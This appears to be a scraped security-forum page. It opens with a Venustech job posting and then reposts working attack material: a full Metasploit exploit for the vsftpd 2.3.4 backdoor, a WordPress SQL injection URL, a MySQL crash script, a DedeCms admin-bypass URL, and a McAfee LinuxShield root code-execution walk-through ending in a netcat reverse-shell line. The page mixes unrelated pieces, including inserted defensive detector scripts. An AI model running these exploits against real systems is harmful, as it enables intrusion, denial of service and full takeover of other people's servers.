
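[Recruitment] [Hiring] Venustech (启明星辰) R&D Recruitment

  • Position: Other
  • Company: Venustech (启明星辰)
  • Location: Beijing
  • Major required: Other
  • Education: Bachelor's degree
  • Work experience: 2 years or more
  • Salary: Negotiable
  • Age requirement: None
  • Gender requirement: None
  • Company website: http://www.venustech.com.cn
  • Résumé e-mail: xiaoyan@sitedirsec.com
  • Phone: 00000000000
  • QQ:
  • Security assistant: recruit or look for work through the 非安全中国 administrators, QQ group: 57116771


  • ++++++++++ About Venustech ++++++++++

    Just send me a message on the site.

    I. R&D Center: Linux C Software Engineer (several openings)

    Responsibilities:

    1. Development and maintenance of software for embedded devices such as security gateways, firewalls and IPS

    Requirements:

    1. Proficient in C programming

    2. Skilled with the Linux operating system; proficient in C programming on Linux

    3. Proficient in TCP/IP and other network protocols; familiar with application-layer protocols and protocol analysis

    4. Familiar with network security protocols and with security devices such as routers, switches and firewalls

    5. Familiar with the Linux kernel and kernel development

    II. R&D Center: Test Engineer (several openings)

    Responsibilities:

    1. System testing and integration testing of products

    2. Writing, executing and revising product test cases

    3. Product performance testing

    4. Support and testing for external projects

    Requirements:

    1. Basic TCP/IP knowledge

    2. Solid data-communications fundamentals

    3. Some Linux background

    4. Able to set up and use databases

    5. Familiar with at least one programming language: C/Perl/VBS/TCL

    6. Familiar with test-case design, system testing and stress testing

    7. Familiar with firewall principles, with some understanding of firewall features

    8. Some understanding of how network security devices are deployed in a network

    9. Able to use testing tools: Loadrunner, packet analysis software, Spirent or IXIA test instruments

    III. R&D Center: Security Event Engineer (several openings)

    Responsibilities:

    1. Delivery of trojan detection services and web vulnerability scanning services

    2. Technical support for service customers

    3. Research on web-page trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows and similar topics

    4. Routine upgrade and maintenance of the security event libraries of products such as IDS/IPS/UTM/TDS/WAG/322

    5. Research on attack techniques; research on the TCP/IP protocols; research on reverse engineering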

     

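    This topic was posted by 小妍. The poster, 小妍, complies with the six management rules of the site's "Copyright and Disclaimer Statement" and holds the corresponding rights.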

    VSFTPD v2.3.4 Backdoor Command Execution Vulnerability

    ##
    # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
          'Description'    => %q{
              This module exploits a malicious backdoor that was added to the VSFTPD download
              archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
              June 30th 2011 and July 1st 2011 according to the most recent information
              available. This backdoor was removed on July 3rd 2011.
          },
          'Author'         => [ 'hdm', 'mc' ],
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision: 13099 $',
          'References'     =>
            [
              [ 'URL', 'http://pastebin.com/AetT9sS5' ],
              [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
            ],
          'Privileged'     => true,
          'Platform'       => [ 'unix' ],
          'Arch'           => ARCH_CMD,
          'Payload'        =>
            {
              'Space'       => 2000,
              'BadChars'    => '',
              'DisableNops' => true,
              'Compat'      =>
                {
                  'PayloadType'    => 'cmd_interact',
                  'ConnectionType' => 'find'
                }
            },
          'Targets'        =>
            [
              [ 'Automatic', { } ],
            ],
          'DisclosureDate' => 'Jul 3 2011',
          'DefaultTarget'  => 0))

        register_options([ Opt::RPORT(21) ], self.class)
      end

      def exploit

        # The backdoor's bind listener may already be running from an earlier trigger
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_status("The port used by the backdoor bind listener is already open")
          handle_backdoor(nsock)
          return
        end

        # Connect to the FTP service port first
        connect

        banner = sock.get_once(-1, 30).to_s
        print_status("Banner: #{banner.strip}")

        sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
        resp = sock.get_once(-1, 30).to_s
        print_status("USER: #{resp.strip}")

        if resp =~ /^530 /
          print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
          disconnect
          return
        end

        if resp !~ /^331 /
          print_error("This server did not respond as expected: #{resp.strip}")
          disconnect
          return
        end

        sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

        # Do not bother reading the response from password, just try the backdoor
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_good("Backdoor service has been spawned, handling...")
          handle_backdoor(nsock)
          return
        end

        disconnect

      end

      def handle_backdoor(s)

        s.put("id\n")

        r = s.get_once(-1, 5).to_s
        if r !~ /uid=/
          print_error("The service on port 6200 does not appear to be a shell")
          disconnect(s)
          return
        end

        print_good("UID: #{r.strip}")

        s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
        handler(s)
      end

    end
    Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.

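A defender's view of the traffic the module above produces, as an added example (not part of the original post or of Metasploit): it flags FTP `USER` names containing `:)` and correlates them with connections to port 6200 on the same server. The one-line event format, the addresses and the 30-second window are assumptions constructed for this illustration.

```python
import re
from datetime import datetime, timedelta

# Hypothetical one-line-per-event sensor format, constructed for this example:
#   <ISO time> <client ip> -> <server ip>:<port> <FTP command | TCP state>
EVENT = re.compile(r'^(\S+) (\S+) -> (\S+):(\d+) (.*)$')

FTP_PORT = 21
BACKDOOR_PORT = 6200            # bind-shell port the module on this page connects to
WINDOW = timedelta(seconds=30)  # assumed maximum gap between trigger and shell connection

# Constructed sample events (documentation address ranges).
SAMPLE_EVENTS = [
    "2011-07-04T09:59:59 198.51.100.77 -> 192.0.2.10:6200 REFUSED",
    "2011-07-04T10:00:00 198.51.100.20 -> 192.0.2.10:21 USER anonymous",
    "2011-07-04T10:00:05 198.51.100.77 -> 192.0.2.10:21 USER qk3:)",
    "2011-07-04T10:00:05 198.51.100.77 -> 192.0.2.10:21 PASS x9",
    "2011-07-04T10:00:06 198.51.100.77 -> 192.0.2.10:6200 ESTABLISHED",
    "2011-07-04T11:30:00 198.51.100.99 -> 192.0.2.11:6200 ESTABLISHED",
    "this line is malformed and must be skipped",
]


def parse_event(line):
    """Split one sensor line into (time, client, server, port, detail) or None."""
    m = EVENT.match(line.strip())
    if not m:
        return None
    ts, client, server, port, detail = m.groups()
    try:
        return datetime.fromisoformat(ts), client, server, int(port), detail
    except ValueError:
        return None


def detect(lines):
    """Return (severity, server, client, reason) tuples in log order."""
    last_trigger = {}  # server ip -> time of the most recent ':)' USER command
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue  # malformed line
        ts, client, server, port, detail = ev
        if port == FTP_PORT:
            m = re.match(r'(?i)USER\s+(.*)$', detail)
            # The module appends ':)' to a random name; matching it anywhere
            # in the name is a deliberately broader rule (assumption).
            if m and ':)' in m.group(1):
                last_trigger[server] = ts
                alerts.append(('medium', server, client, 'USER name contains ":)"'))
        elif port == BACKDOOR_PORT and detail == 'ESTABLISHED':
            seen = last_trigger.get(server)
            if seen is not None and timedelta(0) <= ts - seen <= WINDOW:
                alerts.append(('critical', server, client,
                               'port 6200 opened after ":)" login'))
            else:
                # Covers the "listener is already open" branch of the module.
                alerts.append(('high', server, client,
                               'port 6200 accepting connections'))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```
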

    WordPress Event List Plugin <= 0.7.8 - SQL Injection Vulnerability

    1. Description:

    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php.

    2. Proof of Concept:

    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

    3. Solution:

    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.

    4. Reference:

    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429

    MySQL 5.5.8 Remote Denial-of-Service Vulnerability

    # Python 2 script
    import socket, sys

    print "\n"
    print "----------------------------------------------------------------"
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    print "| Level Smash the Stack                                         |"
    print "----------------------------------------------------------------"
    print "\n"

    buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

    buf2=("\x11\x00\x00\x00\x03set autocommit30")

    def usage():
        print "usage : ./mysql.py <victim_ip>"
        print "example: ./mysql.py 192.168.1.22"

    def main():
        if len(sys.argv) != 2:
            usage()
            sys.exit()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        HOST = sys.argv[1]
        PORT = int(3306)
        s.connect((HOST,PORT))
        print "[*] Connect"
        s.send(buf)
        print "[*] Payload 1 sent"
        s.send(buf2)
        print "[*] Payload 2 sent\n", "[*] Run again to ensure it is down..\n"
        s.close()

    if __name__ == "__main__":
        main()


    Step-by-Step Linux Installation: Setting Up the Virtual Machine
    http://www.sitedir.com.cn/video/4.swf

    DedeCms (织梦) v5.6-5.7 Unauthorized Access Vulnerability
    http://www.XXXX.com/[DedeCms admin directory]/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

    Change validate=dcug in the URL above to the current CAPTCHA code and you get straight into the site's admin back end.

    The precondition for this vulnerability is that the admin back-end path must be known.

    Official temporary fix:

    Find the file include/common.inc.php and replace:

        foreach($_REQUEST as $_k=>$_v)
        {
            var_dump($_k);
            if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
            {
                exit('Request var not allow!');
            }
        }

    with:

        // Check and register externally submitted variables
        function CheckRequest(&$val) {
            if (is_array($val)) {
                foreach ($val as $_k=>$_v) {
                    CheckRequest($_k);
                    CheckRequest($val[$_k]);
                }
            } else
            {
                if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
                {
                    exit('Request var not allow!');
                }
            }
        }
        CheckRequest($_REQUEST);
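Why the replacement in the DedeCms post above matters, as an added example (a Python model written for this page, not DedeCms code): the original loop tests only the top-level keys of `$_REQUEST`, so nested names such as `_POST[GLOBALS][cfg_dbhost]` pass, while the recursive `CheckRequest()` tests every nested key and every scalar value. The names `parse_php_query`, `old_check`, `new_check` and the sample values are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Same pattern as the PHP check: '#^(cfg_|GLOBALS)#'
BLOCKED = re.compile(r'^(cfg_|GLOBALS)')

# Constructed sample: same parameter names as the URL in the post, placeholder values.
SAMPLE_QUERY = ("dopost=login&validate=dcug&userid=admin&pwd=x"
                "&_POST[GLOBALS][cfg_dbhost]=db.example.invalid"
                "&_POST[GLOBALS][cfg_dbuser]=u")


def parse_php_query(qs):
    """Build nested dicts the way PHP fills $_REQUEST from 'a[b][c]=v' names.

    Simplified model: named keys only, no 'a[]' auto-append.
    """
    out = {}
    for pair in qs.split('&'):
        if not pair:
            continue
        name, _, value = pair.partition('=')
        name, value = unquote_plus(name), unquote_plus(value)
        m = re.match(r'^([^\[]+)((?:\[[^\]]*\])*)$', name)
        if not m:
            out[name] = value
            continue
        keys = [m.group(1)] + re.findall(r'\[([^\]]*)\]', m.group(2))
        node = out
        for k in keys[:-1]:
            if not isinstance(node.get(k), dict):
                node[k] = {}
            node = node[k]
        node[keys[-1]] = value
    return out


def old_check(request):
    """Original loop: only top-level keys are tested. Returns rejected keys."""
    return [k for k in request if len(k) > 0 and BLOCKED.match(k)]


def new_check(val, path='$_REQUEST'):
    """Patched CheckRequest(): recurse into arrays, test every key and scalar value."""
    hits = []
    if isinstance(val, dict):
        for k, v in val.items():
            here = "%s[%s]" % (path, k)
            if k and BLOCKED.match(k):          # CheckRequest($_k)
                hits.append(here + " (key)")
            hits.extend(new_check(v, here))     # CheckRequest($val[$_k])
    elif val and BLOCKED.match(val):
        hits.append(path + " (value)")
    return hits


if __name__ == "__main__":
    req = parse_php_query(SAMPLE_QUERY)
    print("old check rejects:", old_check(req))
    print("new check rejects:", new_check(req))
```

Note that the patched function also rejects scalar values that begin with `cfg_` or `GLOBALS`, not only keys, which follows directly from `CheckRequest($val[$_k])` in the fix.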

    Step-by-Step Linux Installation: Setting Up the Virtual Machine Tools
    http://www.sitedir.com.cn/video/8.swf

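    Multiple Security Vulnerabilities in the Django Development Framework
    Published: 2011-09-12

    Affected versions:
    Django 1.2.5
    Django 1.3 beta 1
    Django 1.2.4
    Django 1.2.2
    Django 1.2

    Vulnerability description:

    Django is an open-source web application framework written in Python.
    Django contains multiple security vulnerabilities that allow an attacker to obtain sensitive information, manipulate data, carry out cache-poisoning attacks or cause a denial of service.
    1) When a cache back end is used, an error in session handling in django.contrib.sessions can be exploited to manipulate session information. Successful exploitation requires that the session key is known and that the application allows the attacker to store dictionary-like objects in the cache under a valid session key.
    2) Django's model system includes a field type, URLField, that validates whether a supplied value is a valid URL; if the boolean keyword argument verify_exists is true, it attempts to verify and resolve the supplied URL. By default the underlying socket has no timeout set, so an attacker can exploit this by sending specially crafted URLs that consume all server memory, causing a denial of service.
    3) An error exists in the handling of redirect responses when verifying URLs supplied to the "URLField" field type; an attacker can exploit this by returning a redirect response that points to a "file://" URL, which makes it possible to determine whether local files exist on the server.
    4) An error exists in the handling of the "X-Forwarded-Host" HTTP header when generating the full-path URL for redirect responses; an attacker can exploit this to carry out cache-poisoning attacks.

    References:
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    http://secunia.com/advisories/45939/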


    McAfee LinuxShield Local/Remote Code Execution Vulnerability
    McAfee LinuxShield remote/local code
    Affected versions: McAfee LinuxShield <= 1.5.1
    Remote attack: Yes
    Local exploit: Yes
    Background:
    ===========

    LinuxShield detects and removes viruses and other potentially unwanted
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    scanning engine - the engine common to all our anti-virus products.

    Although a few years ago, the Linux operating system was considered a
    secure environment, it is now seeing more occurrences of software
    specifically written to attack or exploit security weaknesses in
    Linux-based systems. Increasingly, Linux-based systems interact with
    Windows-based computers. Although viruses written to attack Windows-
    based systems do not directly attack Linux systems, a Linux server
    can harbor these viruses, ready to infect any client that connects to
    it.

    When installed on your Linux systems, LinuxShield provides protection
    against viruses, Trojan horses, and other types of potentially
    unwanted software.

    LinuxShield scans files as they are opened and closed - a technique
    known as on-access scanning. LinuxShield also incorporates an
    on-demand scanner that enables you to scan any directory or file in
    your host at any time.

    When kept up-to-date with the latest virus-definition (DAT) files,
    LinuxShield is an important part of your network security. We
    recommend that you set up an anti-virus security policy for your
    network, incorporating as many protective measures as possible.

    LinuxShield uses a web-browser interface, and a large number of
    LinuxShield installations can be centrally controlled by ePolicy
    Orchestrator.

    (Product description from LinuxShield Product Guide)

    Description:
    ============

    This vulnerability allows remote attackers to execute arbitrary code
    on vulnerable installations of McAfee LinuxShield. User interaction
    is not required to exploit this vulnerability but an attacker must
    be authenticated.

    The LinuxShield Webinterface communicates with the locally installed
    "nailsd" daemon, which listens on port 65443/tcp, to do configuration
    changes, query the configuration and execute tasks.

    Each user, which can login to the victim box, can also authenticate
    itself to the "nailsd" and can do configuration changes and execute
    tasks with root privileges.

    A direct execution of commands is not possible, but it is possible to
    download and execute code through manipulation of the config and
    execute schedule tasks of the LinuxShield.

    walk-through (after the TLS handshake):
    +--------------------------------------

    nailsd > +OK welcome to the NAILS Statistics Service
    attacker> auth <user> <pass>
    nailsd > +OK successful authentication

    # Set the Attacker repository to download our code from a httpd
    # (catalog.z)
    #---------------------------------------------------------------
    attacker> db set 1 _table=repository status=1 siteList=<?xml version
    ="1.0" encoding="UTF-8"?><ns:SiteLists xmlns:ns="naSiteLi
    st" GlobalVersion="20030131003110" LocalVersion="20091209
    161903" Type="Client"><SiteList Default="1" Name="SomeGU
    ID"><HttpSite Type="repository" Name="EvilRepo" Order="1
    " Server="<attackerhost>:80" Enabled="1" Local="1"><Rela
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></
    UserName><Password Encrypted="0"/></HttpSite></SiteList></
    ns:SiteLists> _cmd=update
    nailsd > +OK database changes buffered.

    # Execute task to set the attacker repository
    #---------------------------------------------------------------
    attacker> task setsitelist
    nailsd > +OK setting sitelist from CMA.

    # Execute the default Update task to download the code
    #---------------------------------------------------------------
    attacker> task nstart LinuxShield Update
    nailsd > +OK task LinuxShield Update starting

    # Create a Scan profile, which executes our code. The profiles are
    # not stored in the database.
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    #---------------------------------------------------------------
    attacker> sconf ODS_99 begin
    nailsd > +OK 1260400888

    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
    # where our earlier downloaded catalog.z file is stored.
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    #---------------------------------------------------------------
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    ofile.ODS_99.filter.extensions.type=extension nailsd.profil
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
    ss nailsd.profile.ODS_99.action.error=Block
    nailsd > +OK configuration changes buffered
    attacker> sconf ODS_99 commit 1260400888
    nailsd > +OK configuration changes stored

    # Set a scan task with the manipulated profile to execute the code
    #---------------------------------------------------------------
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    mp;exclude:false timetable=type=unscheduled taskResults=0 i
    _lastRun=1260318482 status=Stopped _cmd=insert
    nailsd > +OK database changes buffered

    # Execute scan task to execute the code
    #---------------------------------------------------------------
    attacker> task nstart Evil Task

    +-------------------------------------- walk-through EOF

    To get a reverse root shell place something like this in the catalog.z

    --- snip ---
    #!/bin/sh
    nc -nv <attacker_host> 4444 -e /bin/sh
    --- /snip ---

    Proof of Concept :
    ==================

    http://inj3ct0r.com/sploits/11165.tar.gz

    Solution:
    =========

    McAfee Advisory
    +--------------
    https://kc.mcafee.com/corporate/index?page=content&id=SB10007

    Disclosure Timeline (YYYY/MM/DD):
    =================================

    2009.12.07: Vulnerability found
    2010.02.03: Asked vendor for a PGP key
    2010.02.05: Vendor sent his PGP key
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
                date (2010.02.18) to Vendor
    2010.02.05: Vendor acknowledges the reception of the advisory
    2010.02.16: Ask for a status update, because the planned release date is
                2010.02.18.
    2010.02.16: Vendor response that, they are currently working on a patch
    2010.02.17: Changed release date to 2010.02.25.
    2010.02.22: Vendor gives a status update, that they are able to release
                the patch on 2010.02.25.
    2010.02.24: Ask for a list of affected products and the advisory url.
    2010.02.24: Vendor sends the list.
    2010.03.02: Release of this Advisory
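An audit for the two configuration changes the LinuxShield walk-through above depends on, as an added example (not part of the advisory or of any McAfee tooling): it flags `sconf ... set` commands that point a code-loading path outside the product's install root and `db set ... _table=repository` commands that name an unapproved update server. It assumes the commands come from a log of the nailsd management channel; the trusted root, the allow-list and the sample lines are constructed for this illustration.

```python
import posixpath
import re

# Install root seen in the advisory's enginePath/datPath values; treating it as
# the only legitimate location for scanner code is an assumption of this example.
TRUSTED_ROOT = "/opt/NAI/LinuxShield"
PATH_KEYS = ("scannerPath", "enginePath", "engineLibDir")  # settings naming code to load or run
TRUSTED_REPOS = {"repo.example.internal:80"}               # hypothetical allow-list

# Constructed sample, shortened from the command shapes in the walk-through.
SAMPLE_COMMANDS = [
    'db set 1 _table=repository status=1 siteList=<ns:SiteLists><SiteList>'
    '<HttpSite Type="repository" Server="198.51.100.7:80" Enabled="1"/>'
    '</SiteList></ns:SiteLists> _cmd=update',
    'task setsitelist',
    'sconf ODS_99 set 1260400888 '
    'nailsd.profile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so '
    'nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scratch/update/catalog.z',
    'sconf ODS_1 set 1260400999 '
    'nailsd.profile.ODS_1.scannerPath=/opt/NAI/LinuxShield/../../tmp/x',
]


def under_root(path, root=TRUSTED_ROOT):
    """True if path, with '.' and '..' resolved, stays inside root."""
    norm = posixpath.normpath(path)
    return norm == root or norm.startswith(root + "/")


def audit(commands):
    """Return (line_no, scope, setting, value) for every suspicious change."""
    findings = []
    for n, cmd in enumerate(commands, 1):
        words = cmd.split()
        if len(words) > 3 and words[0] == "sconf" and words[2] == "set":
            # words[1] is the profile name, words[3] the transaction id
            for tok in words[4:]:
                key, sep, val = tok.partition("=")
                setting = key.rsplit(".", 1)[-1]
                if sep and setting in PATH_KEYS and not under_root(val):
                    findings.append((n, words[1], setting, val))
        elif words[:2] == ["db", "set"] and "_table=repository" in words:
            for server in re.findall(r'Server="([^"]*)"', cmd):
                if server not in TRUSTED_REPOS:
                    findings.append((n, "repository", "Server", server))
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_COMMANDS):
        print(finding)
```
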